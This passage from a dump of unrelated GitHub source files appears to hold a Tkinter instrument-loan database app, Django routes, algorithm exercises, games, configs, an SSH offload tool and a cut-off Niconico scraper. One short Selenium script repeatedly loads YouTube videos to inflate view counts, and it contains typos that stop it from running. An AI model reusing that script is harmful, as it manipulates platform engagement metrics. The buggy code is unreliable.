ttk.Label(ventana_registro, text=\"Formato de fecha: AAAA-MM-DD\", font=(\"Arial\", 10, \"bold\"))\r\n ven3_label_instrucciones.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n \r\n \r\n # Boton para ejecutar consulta.\r\n ven3_btn_consultar = ttk.Button(ventana_registro, text=\"Hacer Consulta\", command=execute_query_proyecto_3, width=30)\r\n ven3_btn_consultar.grid(row=10, column=1, padx=(65,0), pady=(180,10))\r\n\r\ndef ventana_consulta_proyecto_5():\r\n # Hace las variables globales para poder acceder desde la ventana principal.\r\n # Quiza hay una mejor manera de hacer esto. Por ahora se usa GLOBAL\r\n global ven5_entry_inicio, ven5_entry_termino, ven5_combo_tipo_instrumento\r\n \r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Consulta de proyecto\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_profesor = ttk.Label(\r\n ventana_registro,\r\n text=\"Prestamos de Instrumentos en Periodo\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_profesor.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels, TextEntries y combobox para cada campo.\r\n ven5_label_inicio = ttk.Label(ventana_registro, text=\"Fecha de Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n ven5_label_inicio.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven5_entry_inicio = ttk.Entry(ventana_registro, width=30)\r\n ven5_entry_inicio.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n ven5_label_termino = ttk.Label(ventana_registro, text=\"Fecha de Termino\", font=(\"Arial\", 10, \"bold\"))\r\n ven5_label_termino.grid(row=2, column=1, padx=(45,0), pady=(20,0))\r\n \r\n ven5_entry_termino = ttk.Entry(ventana_registro, width=30)\r\n ven5_entry_termino.grid(row=3, column=1, padx=(45,0), pady=(0,10))\r\n \r\n \r\n \r\n ven5_label_tipo = ttk.Label(ventana_registro, text=\"Tipo de Instrumento\", font=(\"Arial\", 10, \"bold\"))\r\n ven5_label_tipo.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven5_combo_valores = [\"Baritono\", \"Clarinete\", \"Corno\", \"Trombon\", \"Trompeta\", \"Tuba\", \"Viola\", \"Violin\", \"Violoncello\"]\r\n ven5_combo_tipo_instrumento = ttk.Combobox(ventana_registro, values=ven5_combo_valores, width=30)\r\n ven5_combo_tipo_instrumento.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n # Instrucciones para usuario sobre FECHA\r\n ven5_label_instrucciones = ttk.Label(ventana_registro, text=\"Formato de fecha: AAAA-MM-DD\", font=(\"Arial\", 10, \"bold\"))\r\n ven5_label_instrucciones.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n \r\n \r\n # Boton para ejecutar consulta.\r\n ven5_btn_consultar = ttk.Button(ventana_registro, text=\"Hacer Consulta\", command=execute_query_proyecto_5, width=30)\r\n ven5_btn_consultar.grid(row=10, column=1, padx=(45,0), pady=(130,10))\r\n\r\n\r\ndef ventana_consulta_proyecto_6():\r\n # Hace las variables globales para poder acceder desde la ventana principal.\r\n # Quiza hay una mejor manera de hacer esto. Por ahora se usa GLOBAL\r\n global ven6_entry_inicio, ven6_entry_termino, ven6_combo_tipo_prestamo, ven6_combo_catedra\r\n \r\n # Crea la ventana, La hace de tamano fijo\r\n ventana_registro = tk.Toplevel(root)\r\n ventana_registro.title(\"Consulta de proyecto\")\r\n ventana_registro.geometry(\"500x460\")\r\n ventana_registro.resizable(False, False)\r\n \r\n # Titulo dentro de ventana\r\n label_titulo_registra_profesor = ttk.Label(\r\n ventana_registro,\r\n text=\"Avaluo Total en Periodo\",\r\n font=(\"BlinkMacSystemFont\", 16, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n label_titulo_registra_profesor.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n \r\n \r\n # Agrega labels, TextEntries, y combobox para cada campo.\r\n \r\n ven6_label_inicio = ttk.Label(ventana_registro, text=\"Fecha de Inicio\", font=(\"Arial\", 10, \"bold\"))\r\n ven6_label_inicio.grid(row=2, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven6_entry_inicio = ttk.Entry(ventana_registro, width=30)\r\n ven6_entry_inicio.grid(row=3, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n ven6_label_termino = ttk.Label(ventana_registro, text=\"Fecha de Termino\", font=(\"Arial\", 10, \"bold\"))\r\n ven6_label_termino.grid(row=2, column=1, padx=(45,0), pady=(20,0))\r\n \r\n ven6_entry_termino = ttk.Entry(ventana_registro, width=30)\r\n ven6_entry_termino.grid(row=3, column=1, padx=(45,0), pady=(0,10))\r\n \r\n \r\n \r\n ven6_label_tipo = ttk.Label(ventana_registro, text=\"Tipo de Prestamo\", font=(\"Arial\", 10, \"bold\"))\r\n ven6_label_tipo.grid(row=4, column=0, padx=(15,0), pady=(20,0))\r\n \r\n ven6_combo_valores = [\"Eventual\", \"Anual\", \"Ambos\"]\r\n ven6_combo_tipo_prestamo = ttk.Combobox(ventana_registro, values=ven6_combo_valores, width=30)\r\n ven6_combo_tipo_prestamo.grid(row=5, column=0, padx=(15,0), pady=(0,10))\r\n \r\n \r\n \r\n #ven6_label_catedra = ttk.Label(ventana_registro, text=\"Catedra\", font=(\"Arial\", 10, \"bold\"))\r\n #ven6_label_catedra.grid(row=4, column=1, padx=(45,0), pady=(20,0))\r\n\r\n #ven6_combo2_valores = [\"Baritono\", \"Cornos\", \"Trombon\", \"Trompeta\", \"Tuba\", \"Violin\", \"Violoncellos\"]\r\n #ven6_combo_catedra = ttk.Combobox(ventana_registro, values=ven6_combo2_valores, width=30)\r\n #ven6_combo_catedra.grid(row=5, column=1, padx=(15,0), pady=(0,10))\r\n \r\n # Instrucciones para usuario sobre FECHA\r\n ven6_label_instrucciones = ttk.Label(ventana_registro, text=\"Formato de fecha: AAAA-MM-DD\", font=(\"Arial\", 10, \"bold\"))\r\n ven6_label_instrucciones.grid(row=6, column=0, padx=(15,0), pady=(20,0))\r\n \r\n \r\n \r\n \r\n # Boton para ejecutar consulta.\r\n ven6_btn_consultar = ttk.Button(ventana_registro, text=\"Hacer Consulta\", command=execute_query_proyecto_6, width=30)\r\n ven6_btn_consultar.grid(row=8, column=1, padx=(45,0), pady=(130,10))\r\n\r\n\r\n### Elementos de TAB.4 principal\r\n\r\n\r\n\r\n# Contulta proyecto 1\r\ntab4_btn1 = ttk.Button(tab4, text=\"Instrumentos con Mayor Avaluo\", command=execute_query_proyecto_1, width=50)\r\ntab4_btn1.grid(row=1, column=1, padx=100, pady=(30, 10))\r\n\r\n# Contulta proyecto 2\r\ntab4_btn2 = ttk.Button(tab4, text=\"Instrumentos Disponibles\", command=execute_query_proyecto_2, width=50)\r\ntab4_btn2.grid(row=2, column=1, padx=100, pady=(0, 30))\r\n\r\n# Contulta proyecto 3\r\ntab4_btn3 = ttk.Button(tab4, text=\"Catedras con Instrumentos Prestados en Periodo\", command=ventana_consulta_proyecto_3, width=50)\r\ntab4_btn3.grid(row=3, column=1, padx=100, pady=(0, 10))\r\n\r\n# Contulta proyecto 4\r\ntab4_btn4 = ttk.Button(tab4, text=\"Detalles Estudiantes con Prestamo Eventual\", command=execute_query_proyecto_4, width=50)\r\ntab4_btn4.grid(row=4, column=1, padx=100, pady=(0, 30))\r\n\r\n# Contulta proyecto 5\r\ntab4_btn5 = ttk.Button(tab4, text=\"Prestamos Anuales de Instrumento en Periodo\", command=ventana_consulta_proyecto_5, width=50)\r\ntab4_btn5.grid(row=5, column=1, padx=100, pady=(0, 10))\r\n\r\n# Contulta proyecto 6\r\ntab4_btn6 = ttk.Button(tab4, text=\"Avaluo Total Prestamos en Periodo\", command=ventana_consulta_proyecto_6, width=50)\r\ntab4_btn6.grid(row=6, column=1, padx=100, pady=(0, 15))\r\n\r\n\r\n\r\n\r\n\r\n# Elementos de U.I. De Graficos | TAB 5 ---->\r\n\r\n# ### Funciones de Graficos para TAB5\r\n\r\ndef grafico_stock(data):\r\n print(\"grafico_stock llamado\")\r\n \r\n plt.figure(figsize=(8, 5))\r\n \r\n # Saca los tipos y cantidades de instrumentos de la tabla\r\n types = [row[0] for row in data]\r\n counts = [row[1] for row in data]\r\n \r\n # Define colores, Los colores por defecto no eran suficientes y se repetian\r\n custom_colors = [\r\n 'skyblue', 'orange', 'green', 'coral',\r\n 'lightskyblue', 'pink', 'gray', 'gold',\r\n 'seagreen', 'blue', 'lightyellow', 'salmon',\r\n 'steelblue', 'plum', 'green', 'lightcoral']\r\n\r\n\r\n # Crea pieChart con las labels como valores enteros en vez de %\r\n plt.pie(counts, labels=None, autopct=lambda pct: f'{int(pct / 100 * sum(counts))}', startangle=90, colors=custom_colors)\r\n\r\n # Agrega las Labels al costado del grafico y titulo categorias\r\n plt.legend(types, title='Tipo de Instrumento', loc='center left', bbox_to_anchor=(1, 0.5))\r\n\r\n \r\n # Titulo de ventana\r\n plt.title('Stock Central Instrumentos')\r\n plt.show()\r\n\r\n\r\ndef grafico_prestamos(data):\r\n print(\"grafico_prestamos llamado\")\r\n \r\n tab5_anho = tab5_combo_anho.get()\r\n tab5_mes = tab5_combo_mes.get()\r\n \r\n \r\n instrument_names, lending_counts = zip(*data)\r\n \r\n \r\n plt.figure(figsize=(8, 5))\r\n \r\n plt.bar(instrument_names, lending_counts, color='blue')\r\n \r\n string_titulo_grafico_prestamos = f\"Cantidad de prestamos en {tab5_anho}-{tab5_mes}\"\r\n plt.title(string_titulo_grafico_prestamos)\r\n plt.xlabel('Tipo de Instrumento')\r\n plt.ylabel('Cantidad de Prestamos')\r\n plt.xticks(rotation=45, ha='right')\r\n \r\n plt.yticks(range(max(lending_counts) + 1)) # Hace eje vertical tener valores enteros\r\n\r\n \r\n plt.tight_layout()\r\n plt.show()\r\n \r\n\r\n\r\n# ### Elementos UI de pestana 5.\r\n\r\n# GRAFICO 1\r\n\r\ntab5_label_descripcion_grafico1 = ttk.Label(\r\n tab5,\r\n text=\"Visualizar Stock Central de Instrumentos\",\r\n font=(\"BlinkMacSystemFont\", 9, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n\r\ntab5_label_descripcion_grafico1.grid(row=1, column=0, padx=10, pady=10, columnspan=20)\r\n\r\ntab5_btn_stock = ttk.Button(tab5, text=\"Visualizar Stock\", command=query_graficar_stock, width=25)\r\ntab5_btn_stock.grid(row=2, column=0, padx=25, pady=(0, 15))\r\n\r\n# GRAFICO 2 \r\n\r\ntab5_label_descripcion_grafico2 = ttk.Label(\r\n tab5,\r\n text=\"Visualizar Prestamos Central de Instrumentos\",\r\n font=(\"BlinkMacSystemFont\", 9, \"bold\"),\r\n foreground=\"White\",\r\n padding=(10, 10),\r\n )\r\n\r\ntab5_label_descripcion_grafico2.grid(row=3, column=0, padx=10, pady=10, columnspan=20)\r\n\r\ntab5_anho_valores = [\"2023\", \"2022\", \"2021\", \"2020\"]\r\ntab5_mes_valores = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\"]\r\n\r\ntab5_combo_anho = ttk.Combobox(tab5, values=tab5_anho_valores, width=10)\r\ntab5_combo_anho.grid(row=4, column=0, padx=(10,100), pady=(0,10))\r\n\r\ntab5_combo_mes = ttk.Combobox(tab5, values=tab5_mes_valores, width=10)\r\ntab5_combo_mes.grid(row=4, column=0, padx=(85,0), pady=(0,10))\r\n\r\ntab5_btn_prestamos = ttk.Button(tab5, text=\"Visualizar Prestamos\", command=query_graficar_prestamos, width=25)\r\ntab5_btn_prestamos.grid(row=5, column=0, padx=(0,0), pady=(0, 0))\r\n\r\n\r\n\r\n\r\n\r\n\r\n# ### Fin codigo, Las lineas siguientes tienen que estar al final del archivo para que funcione correctamente.\r\n\r\n# Inicia y refresca la ventana de la UI.\r\nroot.mainloop()\r\n\r\n# Cierra la connection y el cursor al salir de la aplicación.\r\n\r\ncrsr.close()\r\nconnection.close()\r\n","repo_name":"MatiasRGT/BaseDatos1_uni","sub_path":"Instrumentos_DB.py","file_name":"Instrumentos_DB.py","file_ext":"py","file_size_in_byte":60436,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18258400190","text":"from django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import permissions\nfrom drf_yasg.views import get_schema_view\nfrom drf_yasg import openapi\n\n\nschema_view = get_schema_view(\n openapi.Info(\n title=\"Refbooks API\",\n default_version='v1',\n description=\"Сервис терминологии\",\n ),\n patterns=[path('refbooks/', include('med_catalog.urls')),],\n public=True,\n permission_classes=(permissions.AllowAny,),\n)\n\nurlpatterns = [\n path(\n 'docs/',\n schema_view.with_ui('swagger', cache_timeout=0),\n name='schema-swagger-ui'\n ),\n path('admin/', admin.site.urls),\n path('refbooks/', include('med_catalog.urls')),\n]\n","repo_name":"daria-z7/med_catalog_api","sub_path":"med_service/med_service/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22526173797","text":"'''\nLongest decreasing subsequence\n\nGiven array of ints, find the longest subsequence that has all values in increasing order.\nAlso return the values themselves.\n\nExamples:\nInput: arr[] = [15, 27, 14, 38, 63, 55, 46, 65, 85]\nOutput: 3\nExplanation: The longest decreasing sub sequence is [63, 55, 46]\n\nInput: arr[] = [50, 3, 10, 7, 40, 80]\nOutput: 3\nExplanation: The longest decreasing subsequence is [50, 10, 7]\n\nhttps://www.geeksforgeeks.org/longest-decreasing-subsequence/\n'''\n\nclass Prob:\n @staticmethod\n def longestDecreasingSubsequence(array):\n # store longest decreasing subsequence up to a val in the input array.\n longestUpToVal = [1 for _ in array]\n \n # store index of the previous number in longest decreasing subsequence.\n longestDecIndices = [None for _ in array]\n \n # store the index of the longest decreasing subsequence count so far\n longestSeqInd = 0\n \n for i in range(len(array)):\n inputVal = array[i]\n \n for j in range(0,i):\n upToVal = array[j]\n \n if upToVal > inputVal and longestUpToVal[j]+1 > longestUpToVal[i]:\n longestUpToVal[i] = longestUpToVal[j]+1\n longestDecIndices[i] = j\n print(\"longestUpToVal: \", longestUpToVal)\n \n if longestUpToVal[i] > longestUpToVal[longestSeqInd]:\n longestSeqInd = i\n \n longestSubseq = []\n tmpInd = longestSeqInd\n while tmpInd != None:\n longestSubseq.insert(0, array[tmpInd])\n tmpInd = longestDecIndices[tmpInd]\n \n return [max(longestUpToVal), longestSubseq]\n \n @staticmethod\n def test1():\n #array = [50, 3, 10, 7, 40, 80]\n array = [15, 27, 14, 38, 63, 55, 46, 65, 85]\n ans = Prob.longestDecreasingSubsequence(array)\n print(\"test1: ans: \", ans)\n\nProb.test1()\n","repo_name":"mcxu/code-sandbox","sub_path":"PythonSandbox/src/misc/longest_decreasing_subsequence.py","file_name":"longest_decreasing_subsequence.py","file_ext":"py","file_size_in_byte":1960,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"45584305038","text":"# DRL-5G-Scheduler; Author: Zhouyou Gu (zhouyou.gu@sydney.edu.au);\n# Supervisors: Wibowo Hardjawana; Branka Vucetic;\n# This project is developed at Centre for IoT and Telecommunications at The University of Sydney,\n# under a project directly funded by Telstra Corporation Ltd., titled\n# ”Development of an Open Programmable Scheduler for LTE Networks”, from 2018 to 2019.\n# Reference: Z. Gu, C. She, W. Hardjawana, S. Lumb, D. McKechnie, T. Essery, and B. Vucetic,\n# “Knowledge-assisted deep reinforcement learning in 5G scheduler design:\n# From theoretical framework to implementation,” IEEE JSAC., to appear, 2021\n\nimport os\n\nfrom sim_src.sim_helper.event_to_csv import EventToCsvHandler\n\nn_ue = 2\nscalar_list = []\nfor k in range(n_ue):\n scalar = 'ue' + str(k + 1) + '_Latency_ms'\n scalar_list.append(scalar)\n\nevent = [os.path.join(os.path.dirname(os.path.abspath(__file__)), 'online')]\ne = EventToCsvHandler(event_dir=event, dir_pattern='*', scalar_list=scalar_list)\n","repo_name":"zhouyou-gu/drl-5g-scheduler","sub_path":"controller_src/exp_script_example/process_tb_data.py","file_name":"process_tb_data.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"9223268377","text":"from Grid import Grid\nfrom Grid import State\n\nBOARD_SIZE = 3\nINPUT_ERR_MSG = \"'%s' is not a valid position!\"\nINPUT_PROMPT_MSG = \"Enter a number (1-9) to put an %s or type 'exit' to quit the program. \"\nEXIT_FLAG = -1\nMAX_TURNS = 9\n\ndef get_input(mark: State) -> int: \n \"\"\"Gets raw input from cmd.\"\"\"\n user_input = input(INPUT_PROMPT_MSG % mark.name).strip() # Remove extra spaces\n\n if user_input != \"exit\":\n try: \n int_input = int(user_input) - 1\n # Make sure input is in valid range (if, not error raises into our except block)\n assert 0 <= int_input <= 8\n return int_input\n except:\n # Tell them invalid input and do some recursion\n print(INPUT_ERR_MSG % user_input)\n return get_input(mark)\n return EXIT_FLAG # Notify the loop to stop\n\n\ndef detect_win(grid: Grid) -> bool:\n diag_sum = 0\n anti_diag_sum = 0\n\n # Iterate through entire board\n for row in range(grid.size):\n # Initialize our lateral flag\n row_sum = 0\n col_sum = 0\n\n for col in range(grid.size):\n # Since the enum State has -1 for X and 1 for O, we can add the values\n row_sum += grid.get_value((row, col)).value\n col_sum += grid.get_value((col, row)).value\n\n if row == col:\n diag_sum += grid.get_value((row, col)).value\n if row + col == 2:\n anti_diag_sum += grid.get_value((row, col)).value\n\n if grid.size in (abs(row_sum), abs(col_sum), abs(diag_sum), abs(anti_diag_sum)):\n # Someone won the game, the main loop can figure it out\n return True\n return False\n\nreplay_input = \"y\"\n\nwhile replay_input == \"y\":\n\n grid = Grid(BOARD_SIZE)\n current_mark = State.X\n win = False\n user_input = 0 # default to start while loop\n turn_count = 0\n\n while not win and turn_count < MAX_TURNS:\n # Toggle state of the mark\n current_mark = State.X if current_mark == State.O else State.O \n # User Interfacing\n print(grid)\n user_input = get_input(current_mark)\n if user_input == EXIT_FLAG:\n break\n # Applying changes to our grid\n coords = (user_input % grid.size, user_input // grid.size)\n grid.set_value(coords, current_mark)\n win = detect_win(grid)\n turn_count += 1\n\n if user_input == EXIT_FLAG:\n break\n \n print(grid)\n if win:\n print(current_mark.name + \" won the game!\")\n else:\n print(\"It was a draw!\")\n replay_input = input(\"Would you like to play again? (y/n)\").strip()\n \n\n ","repo_name":"B-Ricey763/Tic-Tac-Toe-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13627395720","text":"from selenium import webdriver\nimport time\nimport random\n#from webdriver_manager.chrome import ChromeDriverManager\n\n\ndriver = webdriver.Chrome('/Users/radwan/Downloads/chromedriver')\n\nvideos = [\n'https://www.youtube.com/watch?v=diHR3tdK-3g&t=10s'\n'https://www.youtube.com/watch?v=Z0Kef5Z37sQ'\n'https://www.youtube.com/watch?v=M_iauns2AUc'\n'https://www.youtube.com/watch?v=T5t69f4TQu8'\n\n]\n\n\nfor i in range(20):\n\tprint(\"Running the Video for {} time\".format(i))\n\trandom_video = random.randit(0,8)\n\tdriver.get(videos[random_video])\n\tsleep_time = random.rantin(10, 20)\n\ttime.sleep(sleep_time)\n\ndriver.quit()","repo_name":"easytech2/Programmierung","sub_path":"videoviews.py","file_name":"videoviews.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13627072822","text":"import os\nimport numpy as np\nfrom src.features.bahamas import BahamasLoaderPaired\nfrom src.features.transforms import transform_fcs, FCS\nfolder = os.path.basename(os.path.dirname(__file__))\nsubfolder = os.path.splitext(os.path.basename(__file__))[0]\nname = '/' + folder + '/' + subfolder + '/'\n\n# stock adam optimizer options\n\nadam_opts = {\n 'lr': 0.001,\n 'betas': (0.9, 0.999),\n 'eps': 1e-08,\n 'weight_decay': 0,\n 'amsgrad': False\n}\n\n# configuration from stanford tutorial\n\nloss_params = {\n 'd_period': 2,\n 'lambda': 1\n}\n\n\npaper_opts = adam_opts\npaper_opts['betas'] = (0.5, 0.999)\npaper_opts['lr'] = 0.0002\nfrom src.configs.resnet.stock import g_structure\nfrom src.configs.patchgan.stock import d_structure\nepoch_end = 90\n\nschedule = {\n 'type': 'translator',\n 'loss': 'l1_plus',\n 'loss_params': loss_params,\n 'g_optimizer': 'adam',\n 'd_optimizer': 'adam',\n 'g_optim_opts': paper_opts,\n 'd_optim_opts': paper_opts,\n 'sample_interval': 205,\n 'batch_size': 2,\n 'epochs': epoch_end,\n 'save_model_interval': None,\n 'save_img_interval': None,\n 'save_dir': os.getenv('SDIR') + name,\n 'save_summary': {\n 'epochs': np.arange(0, (epoch_end+1), 5).tolist(),\n 'box_size': (100,100),\n 'transform': FCS(k=4, inverse=True),\n 'n': 4,\n 'grid_size': (2,2)\n }\n}\n\n\n\ntrain_loader = BahamasLoaderPaired([os.getenv('D32'), os.getenv('G32')],\n batch_size=schedule['batch_size'],\n ntest=30,\n transform=transform_fcs,\n train_set=True)\n\n\ntest_loader = BahamasLoaderPaired([os.getenv('D32'), os.getenv('G32')],\n batch_size=10,\n ntest=30,\n transform=transform_fcs,\n train_set=False)\n\n","repo_name":"hyferg/painting-with-baryons","sub_path":"src/configs/schedules/stock.py","file_name":"stock.py","file_ext":"py","file_size_in_byte":1925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43154826316","text":"from typing import List\n\nimport shlex\nfrom dataclasses import dataclass\nfrom autofarm.jobserver import ExecInvocationParam\nfrom autofarm.models import EnvironmentVariableNotFoundError\nfrom autofarm.offload_command_builder.default import OffloadCommandBuilder\n\n\n@dataclass\nclass SSHCommandBuilder(OffloadCommandBuilder):\n remote_invocation_command: str\n remote_invocation_hosts: List[str]\n remote_invocation_skip_directory_change: bool\n\n # Keeps track of which host in the host list is next for offloading. Is incremented before first use\n _remote_host_index = -1\n\n def build_remote_command(self, request):\n remote_command = \"\"\n if not self.remote_invocation_skip_directory_change:\n try:\n remote_command += f'cd {request.getenv(\"PWD\")} && '\n except EnvironmentVariableNotFoundError as e:\n raise EnvironmentVariableNotFoundError(\n 'Cannot determine the current directory because $PWD is missing. '\n 'Turn on \"skip directory change\" if the working directory should be ignored.'\n ) from e\n remote_command += f'exec {shlex.join(request.arguments)}'\n return remote_command\n\n def build_command(self, request: ExecInvocationParam):\n self._remote_host_index = (self._remote_host_index + 1) % len(self.remote_invocation_hosts)\n remote_command = self.build_remote_command(request)\n return ExecInvocationParam(\n self.remote_invocation_command,\n [self.remote_invocation_command,\n self.remote_invocation_hosts[self._remote_host_index],\n remote_command],\n request.environment\n )\n\n\ndef create_ssh(args):\n return SSHCommandBuilder(\n args.remote_shell,\n args.host,\n args.skip_directory_change\n )\n\n\ndef get_ssh_subcommand(subparsers, parent):\n # SSH subcommand\n ssh_subparser = subparsers.add_parser(\n 'ssh', parents=[parent],\n description=\"Offload process invocations to one or more remote computers.\",\n help='Offload process invocations to one or more remote computers.'\n )\n ssh_subparser.set_defaults(offload_command_builder=SSHCommandBuilder)\n ssh_subparser.add_argument(\n '--remote-shell', type=str, default=\"ssh\",\n help='The shell to redirect invoked commands to. Defaults to SSH. '\n 'Make sure that password-less authentication to all hosts is possible.'\n )\n ssh_subparser.add_argument(\n '--host', action='append', default=[], required=True,\n help='Host to offload work to. Specify multiple times to offload work in round-robin schedule.'\n )\n ssh_subparser.add_argument(\n '--skip-directory-change', action='store_true',\n help='Skip the change to the current working directory on the remote host.'\n )\n","repo_name":"Vinpasso/autofarm","sub_path":"autofarm/offload_command_builder/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41859179650","text":"import turtle\n\ndef apply_rules(input_char):\n if input_char == 'F':\n return 'FF'\n elif input_char == 'X':\n return 'F+[[X]-X]-F[-FX]+X'\n else:\n return input_char\n\ndef process_string(old_str):\n new_str = ''\n for char in old_str:\n new_str = new_str + apply_rules(char)\n return new_str\n\ndef create_l_system(num_iters, axiom):\n start_string = axiom\n for i in range(num_iters):\n start_string = process_string(start_string)\n return start_string\n\ndef draw_l_system(turtle, instructions, angle, distance):\n stack = []\n for cmd in instructions:\n if cmd=='F':\n turtle.forward(distance)\n elif cmd=='B':\n turtle.backward(distance)\n elif cmd=='+':\n turtle.right(angle)\n elif cmd=='-':\n turtle.left(angle)\n elif cmd=='[':\n stack.append((turtle.position(), turtle.heading()))\n elif cmd==']':\n position, heading = stack.pop()\n turtle.penup()\n turtle.setposition(position)\n turtle.setheading(heading)\n turtle.pendown()\n\nwindow = turtle.Screen()\nleo = turtle.Turtle()\nleo.speed(0)\n\nl_system = create_l_system(5, \"X\")\ndraw_l_system(leo, l_system, 15, 2)\n\nwindow.exitonclick()\n","repo_name":"tnedr/chat_gpt_projects","sub_path":"fractal_tree.py","file_name":"fractal_tree.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70810425066","text":"import requests\nfrom bs4 import BeautifulSoup, Tag\nimport json\nfrom dataclasses import dataclass\nfrom typing import Literal, Optional, Union, List\nimport re\nfrom urllib.parse import urlparse\n\n\n\"\"\"\n Public APIs\n\"\"\"\n\n\n@dataclass\nclass GetNicoliveProgramNicoliveProgramData:\n name: Optional[str]\n description: Optional[str]\n url: Optional[str]\n thumbnail_url: Optional[List[str]]\n start_date: Optional[str] # ISO8601 timezone-aware datetime string\n end_date: Optional[str] # ISO8601 timezone-aware datetime string\n\n\n@dataclass\nclass GetNicoliveProgramSuccessNicoliveProgramResult:\n result_type: Literal['success']\n data_type: Literal['nicolive_program']\n data: GetNicoliveProgramNicoliveProgramData\n\n\n@dataclass\nclass GetNicoliveProgramInvalidLiveIdOrUrlResult:\n result_type: Literal['invalid_live_id_or_url']\n\n\n@dataclass\nclass GetNicoliveProgramNotFoundResult:\n result_type: Literal['not_found']\n\n\n@dataclass\nclass GetNicoliveProgramMaintenanceResult:\n result_type: Literal['maintenance']\n\n\n@dataclass\nclass GetNicoliveProgramUnknownErrorResult:\n result_type: Literal['unknown_error']\n\n\nGetNicoliveProgramResult = Union[\n GetNicoliveProgramSuccessNicoliveProgramResult,\n GetNicoliveProgramInvalidLiveIdOrUrlResult,\n GetNicoliveProgramNotFoundResult,\n GetNicoliveProgramMaintenanceResult,\n GetNicoliveProgramUnknownErrorResult,\n]\n\n\ndef get_nicolive_program(\n live_id_or_url: str,\n useragent: str,\n) -> GetNicoliveProgramResult:\n nicolive_watch_result = fetch_nicolive_watch(\n live_id_or_url=live_id_or_url,\n useragent=useragent,\n )\n\n if nicolive_watch_result.result_type == 'success':\n if nicolive_watch_result.data_type == 'html':\n html = nicolive_watch_result.data.html\n\n name: Optional[str] = None\n description: Optional[str] = None\n url: Optional[str] = None\n thumbnail_url: Optional[List[str]] = None\n\n # start_date, end_date\n # ISO8601 timezone-aware datetime string\n start_date: Optional[str] = None\n end_date: Optional[str] = None\n\n ogp_result = parse_ogp_in_nicolive_watch_html(html=html)\n if ogp_result.result_type == 'success':\n if ogp_result.data_type == 'ogp':\n ogp_data = ogp_result.data\n\n url = ogp_data.url\n\n json_ld_result = parse_json_ld_in_nicolive_watch_html(html=html)\n if json_ld_result.result_type == 'success':\n if json_ld_result.data_type == 'json_ld':\n json_ld_data = json_ld_result.data\n\n name = json_ld_data.name\n description = json_ld_data.description\n thumbnail_url = json_ld_data.thumbnail_url\n start_date = json_ld_data.start_date\n end_date = json_ld_data.end_date\n\n return GetNicoliveProgramSuccessNicoliveProgramResult(\n result_type='success',\n data_type='nicolive_program',\n data=GetNicoliveProgramNicoliveProgramData(\n name=name,\n description=description,\n url=url,\n thumbnail_url=thumbnail_url,\n start_date=start_date,\n end_date=end_date,\n )\n )\n\n elif nicolive_watch_result.result_type == 'invalid_live_id_or_url':\n return GetNicoliveProgramInvalidLiveIdOrUrlResult(\n result_type='invalid_live_id_or_url',\n )\n\n elif nicolive_watch_result.result_type == 'not_found':\n return GetNicoliveProgramNotFoundResult(\n result_type='not_found',\n )\n\n elif nicolive_watch_result.result_type == 'maintenance':\n return GetNicoliveProgramMaintenanceResult(\n result_type='maintenance',\n )\n\n return GetNicoliveProgramUnknownErrorResult(\n result_type='unknown_error',\n )\n\n\n\"\"\"\n Private API: Fetch a watch page HTML\n https://live.nicovideo.jp/watch/{live_id}\n\"\"\"\n\n\n@dataclass\nclass FetchNicoliveWatchSuccessHtmlData:\n html: str\n\n\n@dataclass\nclass FetchNicoliveWatchSuccessHtmlResult:\n result_type: Literal['success']\n data_type: Literal['html']\n data: FetchNicoliveWatchSuccessHtmlData\n\n\n@dataclass\nclass FetchNicoliveWatchInvalidLiveIdOrUrlResult:\n result_type: Literal['invalid_live_id_or_url']\n\n\n@dataclass\nclass FetchNicoliveWatchNotFoundResult:\n result_type: Literal['not_found']\n\n\n@dataclass\nclass FetchNicoliveWatchMaintenanceResult:\n result_type: Literal['maintenance']\n\n\n@dataclass\nclass 